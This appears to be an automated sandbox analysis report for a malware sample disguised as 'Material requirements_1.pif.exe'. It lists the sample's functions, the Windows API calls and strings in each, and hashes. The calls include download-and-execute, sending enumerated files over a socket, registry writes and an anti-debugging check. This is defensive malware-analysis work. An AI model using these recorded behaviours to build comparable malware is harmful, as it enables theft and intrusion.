                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                        • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: ACP$OCP
                        • API String ID: 2299586839-711371036
                        • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                        • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                        • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                        • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                        Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                        • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                        • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                        • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$FindLoadLockSizeof
                        • String ID: SETTINGS
                        • API String ID: 3473537107-594951305
                        • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                        • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                        • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                        • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                        Function 004513C7 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                        • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                        • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                        • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                        • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                        • String ID:
                        • API String ID: 745075371-0
                        • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                        • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                        • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                        • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                        Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 00407A91
                        • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstH_prologNext
                        • String ID:
                        • API String ID: 1157919129-0
                        • Opcode ID: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                        • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                        • Opcode Fuzzy Hash: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                        • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                        Function 0044801F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                        • _free.LIBCMT ref: 00448077
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 00448243
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                        • String ID:
                        • API String ID: 1286116820-0
                        • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                        • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                        • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                        • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                        Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: DownloadExecuteFileShell
                        • String ID: C:\Users\user\Desktop\Material requirements_1.pif.exe$open
                        • API String ID: 2825088817-1736059791
                        • Opcode ID: e28f25d4d19b8d56baa702e1e00f9abcfc38949ec24a855979b27e8ae747898c
                        • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                        • Opcode Fuzzy Hash: e28f25d4d19b8d56baa702e1e00f9abcfc38949ec24a855979b27e8ae747898c
                        • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                        Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstNextsend
                        • String ID: x@G$x@G
                        • API String ID: 4113138495-3390264752
                        • Opcode ID: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                        • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                        • Opcode Fuzzy Hash: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                        • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                        Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                          • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                          • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                          • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateInfoParametersSystemValue
                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                        • API String ID: 4127273184-3576401099
                        • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                        • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                        • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                        • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                        Function 00450A8F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                        • _wcschr.LIBVCRUNTIME ref: 00450C01
                        • _wcschr.LIBVCRUNTIME ref: 00450C0F
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                        • String ID:
                        • API String ID: 4212172061-0
                        • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                        • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                        • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                        • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                        Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 00408DAC
                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstH_prologNext
                        • String ID:
                        • API String ID: 301083792-0
                        • Opcode ID: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                        • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                        • Opcode Fuzzy Hash: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                        • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                        Function 00450E7A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorInfoLastLocale$_free$_abort
                        • String ID:
                        • API String ID: 2829624132-0
                        • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                        • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                        • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                        • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                        Function 0043A66D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434413), ref: 0043A765
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434413), ref: 0043A76F
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434413), ref: 0043A77C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                        • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                        • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                        • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                        Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 00442585
                        • TerminateProcess.KERNEL32(00000000,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 0044258C
                        • ExitProcess.KERNEL32 ref: 0044259E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                        • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                        • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                        • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                        Function 0044D5F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                        • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                        • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                        • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                        Function 004475A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: GetLocaleInfoEx
                        • API String ID: 2299586839-2904428671
                        • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                        • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                        • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                        • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                        Function 004510CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$InfoLocale_abort
                        • String ID:
                        • API String ID: 1663032902-0
                        • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                        • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                        • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                        • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                        Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                        • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                        • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                        • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                        Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$InfoLocale_abort_free
                        • String ID:
                        • API String ID: 2692324296-0
                        • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                        • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                        • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                        • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                        Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                        • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                        • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                        • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                        Function 004470BE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-0003D145,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                        • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalEnterEnumLocalesSectionSystem
                        • String ID:
                        • API String ID: 1272433827-0
                        • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                        • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                        • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                        • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                        Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
